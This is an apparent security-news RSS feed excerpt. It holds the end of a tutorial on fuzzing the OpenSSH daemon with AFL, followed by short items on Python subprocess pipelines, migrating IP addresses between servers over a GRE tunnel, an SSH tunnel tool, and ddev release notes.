Server listening on :: port 2200.</code></pre><p>Then start a client (using the <code>ssh</code> binary you’ve just compiled) under strace:</p><pre><code>$ strace -e trace=write -o strace.log -f -s 8192 ./ssh -c none -p 2200 localhost</code></pre><p>This should hopefully log you in (if not, you may have to fiddle with users, keys, and passwords until you succeed in logging in to the server you just started).</p><p>The first few lines of the strace log should read something like this:</p><pre><code>2945  write(3, "SSH-2.0-OpenSSH_7.4\r\n", 21) = 21
2945  write(3, "\0\0\4|\5\24\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0010curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c\0\0\1\"ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa\0\0\0\4none\0\0\0\4none\0\0\0\325umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\0\0\0\325umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\0\0\0\32none,zlib@openssh.com,zlib\0\0\0\32none,zlib@openssh.com,zlib\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 1152) = 1152</code></pre><p>We see here that the client is communicating over file descriptor 3. You will have to delete all the writes happening on other file descriptors. Then take the strings and paste them into a Python script, something like:</p><pre><code>import sys
for x in [
    "SSH-2.0-OpenSSH_7.4\r\n"
    "\0\0\4..."
    ...
]:
    sys.stdout.write(x)</code></pre><p>When you run this, it will print a byte-perfect copy of everything that the client sent to stdout. Just redirect this to a file. That file will be your first input testcase.</p><p>You can do a test run (without AFL) by passing the same data to the server again (this time using <code>-i</code>):</p><pre><code>./sshd -d -e -p 2200 -r -f sshd_config -i &lt; testcase 2&gt;&amp;1 &gt; /dev/null</code></pre><p>Hopefully it will show that your testcase replay was able to log in successfully.</p><p>Before starting the fuzzer you can also double check that the instrumentation works as expected using afl-analyze:</p><pre><code>~/afl-2.39b/afl-analyze -i testcase -- ./sshd -d -e -p 2200 -r -f sshd_config -i</code></pre><p>This may take a few seconds to run, but should eventually show you a map of the file and what it thinks each byte means. If there is too much red, that’s an indication you were not able to disable checksumming/encryption properly (maybe you have to <code>make clean</code> and rebuild?). You may also see other errors, including that AFL didn’t detect any instrumentation (did you compile sshd with <code>afl-clang-fast</code>?). This is general AFL troubleshooting territory, so I’d recommend checking out the AFL documentation.</p><h2>Creating an OpenSSH dictionary</h2><p>I created an AFL “dictionary” for OpenSSH, which is basically just a list of strings with special meaning to the program being fuzzed. I just used a few of the strings found by running <code>ssh -Q cipher</code>, etc. to allow the fuzzer to use these strings without having to discover them all at once (which is pretty unlikely to happen by chance).</p><pre><code>s0="3des-cbc"
s1="aes128-cbc"
s2="aes128-ctr"
s3="aes128-gcm@openssh.com"
s4="aes192-cbc"
s5="aes192-ctr"
s6="aes256-cbc"
s7="aes256-ctr"
s8="aes256-gcm@openssh.com"
s9="arcfour"
s10="arcfour128"
s11="arcfour256"
s12="blowfish-cbc"
s13="cast128-cbc"
s14="chacha20-poly1305@openssh.com"
s15="curve25519-sha256@libssh.org"
s16="diffie-hellman-group14-sha1"
s17="diffie-hellman-group1-sha1"
s18="diffie-hellman-group-exchange-sha1"
s19="diffie-hellman-group-exchange-sha256"
s20="ecdh-sha2-nistp256"
s21="ecdh-sha2-nistp384"
s22="ecdh-sha2-nistp521"
s23="ecdsa-sha2-nistp256"
s24="ecdsa-sha2-nistp256-cert-v01@openssh.com"
s25="ecdsa-sha2-nistp384"
s26="ecdsa-sha2-nistp384-cert-v01@openssh.com"
s27="ecdsa-sha2-nistp521"
s28="ecdsa-sha2-nistp521-cert-v01@openssh.com"
s29="hmac-md5"
s30="hmac-md5-96"
s31="hmac-md5-96-etm@openssh.com"
s32="hmac-md5-etm@openssh.com"
s33="hmac-ripemd160"
s34="hmac-ripemd160-etm@openssh.com"
s35="hmac-ripemd160@openssh.com"
s36="hmac-sha1"
s37="hmac-sha1-96"
s38="hmac-sha1-96-etm@openssh.com"
s39="hmac-sha1-etm@openssh.com"
s40="hmac-sha2-256"
s41="hmac-sha2-256-etm@openssh.com"
s42="hmac-sha2-512"
s43="hmac-sha2-512-etm@openssh.com"
s44="rijndael-cbc@lysator.liu.se"
s45="ssh-dss"
s46="ssh-dss-cert-v01@openssh.com"
s47="ssh-ed25519"
s48="ssh-ed25519-cert-v01@openssh.com"
s49="ssh-rsa"
s50="ssh-rsa-cert-v01@openssh.com"
s51="umac-128-etm@openssh.com"
s52="umac-128@openssh.com"
s53="umac-64-etm@openssh.com"
s54="umac-64@openssh.com"</code></pre><p>Just save it as <code>openssh.dict</code>; to use it, we will pass the filename to the <code>-x</code> option of <code>afl-fuzz</code>.</p><h2>Running AFL</h2><p>Whew, it’s finally time to start the fuzzing!</p><p>First, create two directories, <code>input</code> and <code>output</code>. Place your initial testcase in the <code>input</code> directory. Then, for the output directory, we’re going to use a little hack that I’ve found to speed up the fuzzing process and keep AFL from hitting the disk all the time: mount a tmpfs RAM-disk on <code>output</code> with:</p><pre><code>sudo mount -t tmpfs none output/</code></pre><p>Of course, if you shut down (or crash) your machine without copying the data out of this directory, it will be gone, so you should make a backup of it every once in a while. I personally just use a bash one-liner that just tars it up to the real on-disk filesystem every few hours.</p><p>To start a single fuzzer, you can use something like:</p><pre><code>~/afl-2.39b/afl-fuzz -x sshd.dict -i input -o output -M 0 -- ./sshd -d -e -p 2100 -r -f sshd_config -i</code></pre><p>Again, see the AFL docs on how to do parallel fuzzing. I have a simple bash script that just launches a bunch of the line above (with different values to the <code>-M</code> or <code>-S</code> option) in different screen windows.</p><p>Hopefully you should see something like this:</p><pre><code>                         american fuzzy lop 2.39b (31)

┌─ process timing ─────────────────────────────────────┬─ overall results ─────┐
│        run time : 0 days, 13 hrs, 22 min, 40 sec     │  cycles done : 152    │
│   last new path : 0 days, 0 hrs, 14 min, 57 sec      │  total paths : 1577   │
│ last uniq crash : none seen yet                      │ uniq crashes : 0      │
│  last uniq hang : none seen yet                      │   uniq hangs : 0      │
├─ cycle progress ────────────────────┬─ map coverage ─┴───────────────────────┤
│  now processing : 717* (45.47%)     │    map density : 3.98% / 6.67%         │
│ paths timed out : 0 (0.00%)         │ count coverage : 3.80 bits/tuple       │
├─ stage progress ────────────────────┼─ findings in depth ────────────────────┤
│  now trying : splice 4              │ favored paths : 117 (7.42%)            │
│ stage execs : 74/128 (57.81%)       │  new edges on : 178 (11.29%)           │
│ total execs : 74.3M                 │ total crashes : 0 (0 unique)           │
│  exec speed : 1888/sec              │   total hangs : 0 (0 unique)           │
├─ fuzzing strategy yields ───────────┴───────────────┬─ path geometry ────────┤
│   bit flips : n/a, n/a, n/a                         │    levels : 7          │
│  byte flips : n/a, n/a, n/a                         │   pending : 2          │
│ arithmetics : n/a, n/a, n/a                         │  pend fav : 0          │
│  known ints : n/a, n/a, n/a                         │ own finds : 59         │
│  dictionary : n/a, n/a, n/a                         │  imported : 245        │
│       havoc : 39/25.3M, 20/47.2M                    │ stability : 97.55%     │
│        trim : 2.81%/1.84M, n/a                      ├────────────────────────┘
└─────────────────────────────────────────────────────┘          [cpu015: 62%]</code></pre><h2>Crashes found</h2><p>In about a day of fuzzing (even before disabling encryption), I found a couple of NULL pointer dereferences during key exchange. Fortunately, these crashes are not harmful in practice because of OpenSSH’s privilege separation code, so at most we’re crashing an unprivileged child process and leaving a scary segfault message in the system log. The fix made it in CVS here: <a href="http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c?rev=1.131&amp;content-type=text/x-cvsweb-markup" class="uri">http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c?rev=1.131&amp;content-type=text/x-cvsweb-markup</a>.</p><h2>Conclusion</h2><p>Apart from the two harmless NULL pointer dereferences I found, I haven’t been able to find anything else yet, which seems to indicate that OpenSSH is fairly robust (which is good!).</p><p>I hope some of the techniques and patches I used here will help more people get into fuzzing OpenSSH.</p><p>Other things to do from here include doing some fuzzing rounds using ASAN or running the corpus through valgrind, although it’s probably easier to do this once you already have a good sized corpus found without them, as both ASAN and valgrind have a performance penalty.</p><p>It could also be useful to look into <code>./configure</code> options to configure the build more like a typical distro build; I haven’t done anything here except to get it to build in a minimal environment.</p><p>Please let me know in the comments if you have other ideas on how to expand coverage or make fuzzing OpenSSH faster!</p><h2>Thanks</h2><p>I’d like to thank Oracle (my employer) for providing the hardware on which to run lots of AFL instances in parallel :-)</p><div class="footnotes"><hr><ol><li><p>Well, we can’t fix up signatures we don’t have the private key for, so in those cases we’ll just assume the attacker does have the private key. You can still do damage e.g. in an otherwise locked down environment; as an example, GitHub uses the SSH protocol to allow pushing to your repositories. These SSH accounts are heavily locked down, as you can’t run arbitrary commands on them. In this case, however, we do have have the secret key used to authenticate and sign messages.<a href="http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html#fnref1">↩</a></p></li>
</ol></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Python subprocess and stderr]]></title>
<description><![CDATA[Suppose you want to create a pipeline with the subprocess and you want to capture the stderr. A colleague of mine upstream wrote this:

    p1 = subprocess.Popen(cmd1,
      stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
    p2 = subprocess.Popen(cmd2, stdin=p1.stdout,
      stdo...]]></description>
<link>https://tsecurity.de/de/3500574/unix-server/python-subprocess-and-stderr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500574/unix-server/python-subprocess-and-stderr/</guid>
<pubDate>Fri, 08 May 2026 22:49:15 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Suppose you want to create a pipeline with the subprocess and you want to capture the stderr. A colleague of mine upstream wrote <a href="https://review.opendev.org/c/openstack/cinder/+/897245" target="_blank" rel="nofollow">this</a>:</p>
<p></p><pre><code>
    p1 = subprocess.Popen(cmd1,
      stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
    p2 = subprocess.Popen(cmd2, stdin=p1.stdout,
      stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
    p1.stdout.close()
    p1_stderr = p1.communicate()
    p2_stderr = p2.communicate()
    return p1.returncode or p2.returncode, p1_stderr, p2_stderr
</code></pre>
<p>Unfortunately, the above saves the p1.stdout in memory, which may come back to bite the user once the amount piped becomes large enough.</p>
<p>I think the right answer is <a href="https://review.opendev.org/c/openstack/cinder/+/899488" target="_blank" rel="nofollow">this</a>:</p>
<p></p><pre><code>
    with tempfile.TemporaryFile() as errfile:
        p1 = subprocess.Popen(cmd1,
          stdout=subprocess.PIPE, stderr=errfile, close_fds=True)
        p2 = subprocess.Popen(cmd2, stdin=p1.stdout,
          stdout=subprocess.PIPE, stderr=errfile, close_fds=True)
        p1.stdout.close()
        p2.communicate()
        p1.wait()
        errfile.seek(0)
        px_stderr = errfile.read()
    return p1.returncode or p2.returncode, px_stderr
</code></pre>
<p>Stackoverflow is overflowing with noise on this topic. Just ignore it.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gradual migration of IP address/port between servers]]></title>
<description><![CDATA[I'm a strong proponent of self-hosting all your services, if not on your own hardware than at least on
dedicated rented hardware.  For IT nerds of my generation, this has been the norm sicne the early 1990s: If
you wante to run your own webserver/mailserver/... back then, the only way was to self...]]></description>
<link>https://tsecurity.de/de/3500553/unix-server/gradual-migration-of-ip-addressport-between-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500553/unix-server/gradual-migration-of-ip-addressport-between-servers/</guid>
<pubDate>Fri, 08 May 2026 22:48:34 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>I'm a strong proponent of self-hosting all your services, if not on your own hardware than at least on
dedicated rented hardware.  For IT nerds of my generation, this has been the norm sicne the early 1990s: If
you wante to run your own webserver/mailserver/... back then, the only way was to self-host.</p>
<p>So over the last 30 years, I've always been running a fleet of machines, some my own hardware colocated,
and during the past ~18 years also some rented dedicated "root servers".  They run a plethora of services for
either my personal stuff (like this blog, or my personal email server), or any of the IT services of the open
source projects I'm involved in (like osmocom) or the company I co-founded and run (sysmocom).</p>
<p>Every few years there's the need to migrate to new hardware.  Either due to power consumption/efficiency, or
to increase performance, or to simply avoid aging hardware that may be dying soon.</p>
<p>When upgrading from one [hosted] server to another [hosted] server, there's always the question of how to
manage the migration with minimal interruption to services.  For very simple services like http/https,
it can usually be done entirely within DNS:  You reduce the TTL of the records, bring up the service
on the new server (with a new IP), make the change in the DNS and once the TTL of the DNS record is expired in
all caches, everybody will access the new server/IP.</p>
<p>However, there are services where the IP address must be retained. SMTP is a prime example of that.  Given how
spam filtering works, you certainly will not want to give up your years if not decadeds of good reputation for
your IP address.  As a result, you will want to keep the IP address while doing the migration.</p>
<p>If it's a physical machine in colocation or your home, you can of course do that all rather easily under your
control.  You can synchronize the various steps from stopping the services on the old machine, rsync'ing over
the spool files to the new, then migrate the IP over to the new machine.</p>
<p>However, if it's a rented "root" server at a company like Hetzner or KVH, then you do not have full control
over when exactly the IP address will be migrated over to the new server.</p>
<p>Also, if there are many different services on that same physical machine, running on a variety of different
IPv4/IPv6 addresess and ports, it may be difficult to migrate all of them at once.  It would be much more
practical, if individual services could be migrated step by step.</p>
<p>The poor man's approach would be to use port-forwarding / reverse-proxying.  In this case, the client
establishes a TCP connection to the old IP address on the old server, and a small port-forward proxy accepts
that TCP connectin, creates a second TCP connection to the new server, and bridges those two together.
This approach only works for the most simplistic of services (like web servers), where</p>
<ul class="simple">
<li><p>there are only inbound connections from remote clients (as outbound connections from the new server would
originate from the new IP, not the old one), and</p></li>
<li><p>where the source IP of the client doesn't matter.  To the new server all connections' source IP addresses
suddenly are masked and there's only one source IP (the old server) for all connections.</p></li>
</ul>
<p>For more sophisticated serviecs (like e-mail/SMTP, again), this is not an option.  The SMTP client IP address
matters for whitelists/blacklists/relay rules, etc.  And of course there are also plenty of outbound SMTP
connections which need to originate from the old IP, not the new IP.</p>
<p>So in bed last night [don't ask], I was brainstorming if the goal of fully transparent migration of individual
TCP+UDP/IP (IPv4+IPv6) services could be made between and old and new server.  In theory it's rather simple,
but in practice the IP stack is not really designed for this, and we're breaking a lot of the assumptions
and principles of IP networking.</p>
<p>After some playing around earlier today, I was actually able to create a working setup!</p>
<p>It fulfills the followign goals / exhibits the following properties:</p>
<ul class="simple">
<li><p>old and new server run concurrently for any amount of time</p></li>
<li><p>individual IP:port tuples can be migrated from old to new server, as services are migrated step by step</p></li>
<li><p>fully transparent to any remote peer: Old IP:port of server visible to client</p></li>
<li><p>fully transparent to the local service: Real client IP:port of client visible to server</p></li>
<li><p>no constraints on whether or not the old and new IPs are in the same subnet, link-layer, data centre, ...</p></li>
<li><p>use only stock features of the Linux kernel, no custom software, kernel patches, ...</p></li>
<li><p>no requirement for controlling a router in front of either old or new server</p></li>
</ul>
<section>
<h2>General Idea</h2>
<p>The general idea is to receive and classify incoming packets on the old server, and then selectively tunnel
some of them via a GRE tunnel from the old machine to the new machine, where they are decapsulated and passed
to local processes on the new server.  Any packets generated by the service on the new server (responses to
clients or outbound connections to remote serveers) will take the opposite route:  They will be encapsulated
on the new server, passed through that GRE tunnel back to the old server, from where they will be sent off to
the internet.</p>
<p>That sounds simple in theory, but it poses a number of challenges:</p>
<ul class="simple">
<li><p>packets destined for a local IP address of the old server need to be re-routed/forwarded, not delivered to
local sockets.  This is easily done with fwmark, multiple routing tables and a rule, similar ro many other
policy routing setups.</p></li>
<li><p>FIXME</p></li>
</ul>
</section>]]></content:encoded>
</item>
<item>
<title><![CDATA[sqt -- SSH Quick Tunnel]]></title>
<description><![CDATA[I made sqt, a convenient unix-style tunnel tool for local or remote use over ssh. sqt is useful when you are working across terminals or SSH sessions and you just want to stream data from one place to another without setting up a full file transfer or complicated SSH command This is especially co...]]></description>
<link>https://tsecurity.de/de/3497798/linux-tipps/sqt-ssh-quick-tunnel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497798/linux-tipps/sqt-ssh-quick-tunnel/</guid>
<pubDate>Fri, 08 May 2026 04:41:01 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I made sqt, a convenient unix-style tunnel tool for local or remote use over ssh.</p> <p>sqt is useful when you are working across terminals or SSH sessions and you just want to stream data from one place to another without setting up a full file transfer or complicated SSH command</p> <p>This is especially convenient with remote work. Often you already have a shell open on a remote machine, and you want to send data from/to your laptop. Normally you might reach for scp, rsync, or a long SSH pipeline. Those are great tools, but they can be very verbose and annoying to setup when you only need a quick one-off transfer. sqt was created to solve exactly that.</p> <p>Link: <a href="https://codeberg.org/BlackFuffey/sqt">https://codeberg.org/BlackFuffey/sqt</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/BlackFuffey"> /u/BlackFuffey </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1t6urlw/sqt_ssh_quick_tunnel/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1t6urlw/sqt_ssh_quick_tunnel/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.5]]></title>
<description><![CDATA[Note: This release contains regressions. Update to the latest version for fixes.
Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux or WSL2: Use apt install ddev or apt upgrade ddev see apt/yum installati...]]></description>
<link>https://tsecurity.de/de/3497303/downloads/v1245/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497303/downloads/v1245/</guid>
<pubDate>Thu, 07 May 2026 22:17:29 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Note: This release contains regressions. Update to the latest version for fixes.</h2>
<h2>Installation</h2>
<p>See the <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux or WSL2: Use <code>apt install ddev</code> or <code>apt upgrade ddev</code> see <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Traditional Windows: Use <code>choco upgrade -y ddev</code>, or download the ddev_windows_installer below.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>⚠ Homebrew users with old <code>drud</code> formula only</h2>
<p>If you can't update or remove the old <code>ddev</code> formula from <code>drud</code>, use this:</p>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='rm -rf "$(brew --repo drud/homebrew-ddev)"
brew uninstall -f ddev
brew install ddev/ddev/ddev'><pre>rm -rf <span class="pl-s"><span class="pl-pds">"</span><span class="pl-s"><span class="pl-pds">$(</span>brew --repo drud/homebrew-ddev<span class="pl-pds">)</span></span><span class="pl-pds">"</span></span>
brew uninstall -f ddev
brew install ddev/ddev/ddev</pre></div>
<h2>Highlights</h2>
<ul>
<li>Improved (experimental) support for <a href="https://learn.microsoft.com/en-us/windows/wsl/networking#mirrored-mode-networking" rel="nofollow">WSL2 "Mirrored" Networking</a>. Fixed port waiting timeouts (thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvinhinz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvinhinz">@marvinhinz</a>) and added automatic Xdebug connection configuration.<br>
If you're using Windows WSL2 with "Mirrored" Networking, set the experimental <code>hostAddressLoopback=true</code> feature.</li>
<li>Resolved "unknown" state caused by PhpStorm's use of <code>docker-compose run</code> for one-off containers. The <a href="https://plugins.jetbrains.com/plugin/18813-ddev-integration" rel="nofollow">DDEV Integration</a> plugin will no longer fail in this case. Edge cases with Node remain; see <a href="https://youtrack.jetbrains.com/issue/WEB-64513/Node-docker-compose-optionally-dont-recreate-a-container-on-each-run" rel="nofollow">JetBrains issue WEB-64513</a>.</li>
<li>VPN or Proxy configuration with DDEV? A dedicated <a href="https://ddev.readthedocs.io/en/stable/users/usage/networking/" rel="nofollow">Special Network Configurations</a> docs page is now available.</li>
<li>Want to learn more about DDEV? AI-generated insights available at <a href="https://deepwiki.com/ddev/ddev" rel="nofollow">ddev/ddev | DeepWiki</a>.</li>
</ul>
<h2>Features</h2>
<ul>
<li>Downloaded Mutagen and <code>docker-compose</code> binaries now pass SHA checksum verification with retry logic.</li>
<li>New environment variables: <code>DDEV_PRIMARY_URL_PORT</code>, <code>DDEV_PRIMARY_URL_WITHOUT_PORT</code>, and <code>DDEV_SCHEME</code>. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a>.</li>
<li><code>DDEV_APPROOT</code> variable available in the <code>web</code> container. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shelane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shelane">@shelane</a>.</li>
<li>Support for <code>prepend.Dockerfile*</code> files for multi-stage Docker builds. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a>.</li>
<li>Improved output of <code>ddev add-on get</code> and added warning exit code. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a>.</li>
<li>WordPress <code>--path</code> is now added automatically to <code>ddev wp</code> when <code>docroot</code> is set. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pfructuoso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pfructuoso">@pfructuoso</a> from <a href="http://www.nazaries.com/" rel="nofollow">www.nazaries.com</a>.</li>
<li>Craft CMS settings now reside in <code>.ddev/.env.web</code>; <code>.env</code> is no longer managed by DDEV.</li>
<li>Added shell completion for the <code>--service</code> (<code>-s</code>) flag in <code>ddev exec</code>, <code>ddev logs</code>, <code>ddev ssh</code>, <code>ddev debug rebuild</code>.</li>
<li>Support TYPO3 v14 nginx configuration.</li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Remove redundant media stanzas from <code>nginx.conf</code>. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barbieswimcrew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barbieswimcrew">@barbieswimcrew</a>.</li>
<li><code>ddev xhgui launch</code> now correctly respects non-default ports. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PierrePaul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PierrePaul">@PierrePaul</a>.</li>
<li>Avoid overriding <code>WP_ENVIRONMENT_TYPE</code> for WordPress.</li>
<li><code>ddev config</code> now works with non-default project names in <code>config.*.yaml</code>.</li>
<li>Prevent PhpStorm's debug integration from triggering stdin-related connections. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a>.</li>
<li>PostgreSQL exports now use fast checkpoints to avoid prolonged backup blockages. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a>.</li>
<li><code>ddev_version_constraint</code> now supports wildcards like <code>1.24.x</code> and comparison operators like <code>&gt; 1.24.5</code>.</li>
<li>Fixed broken HTTP/HTTPS port resolution. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a>.</li>
</ul>
<h2>Deprecations</h2>
<ul>
<li><code>ddev composer create</code> is deprecated. Use <code>ddev composer create-project</code>.</li>
<li><code>ddev debug capabilities</code> is deprecated. Use <code>ddev_version_constraint</code> for project and add-on checks.</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.21 and 8.4.7.</li>
<li><code>docker-compose</code> v2.36.0.</li>
<li>Chocolatey removed from automated Windows installation scripts. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colans">@colans</a>.</li>
<li>Magento 2 quickstart now uses OpenSearch. Drupal CMS quickstart improved. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a>.</li>
<li>Updated Craft CMS quickstart. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/timkelty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/timkelty">@timkelty</a>.</li>
<li><code>ddev start</code> checks for an <code>index.*</code> file in docroot and warns if missing (403 errors in browser).</li>
<li>Pimcore quickstart now requires a license due to upstream license change.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>docs: Add missing <code>sequelace</code> command link to <code>database-management.md</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TravisCarden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TravisCarden">@TravisCarden</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2967378873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7184" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7184/hovercard" href="https://github.com/ddev/ddev/pull/7184">#7184</a></li>
<li>docs: add tip on using per-project API tokens for hosting providers, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2963439248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7177" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7177/hovercard" href="https://github.com/ddev/ddev/issues/7177">#7177</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2965989877" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7183" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7183/hovercard" href="https://github.com/ddev/ddev/pull/7183">#7183</a></li>
<li>fix: ignore curl error in <code>Dockerfile.test</code> for <code>ddev debug test</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2969336553" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7186" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7186/hovercard" href="https://github.com/ddev/ddev/pull/7186">#7186</a></li>
<li>fix: don't wait for one-off containers from PhpStorm, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2947750889" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7146" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7146/hovercard" href="https://github.com/ddev/ddev/issues/7146">#7146</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2949345168" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7148" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7148/hovercard" href="https://github.com/ddev/ddev/pull/7148">#7148</a></li>
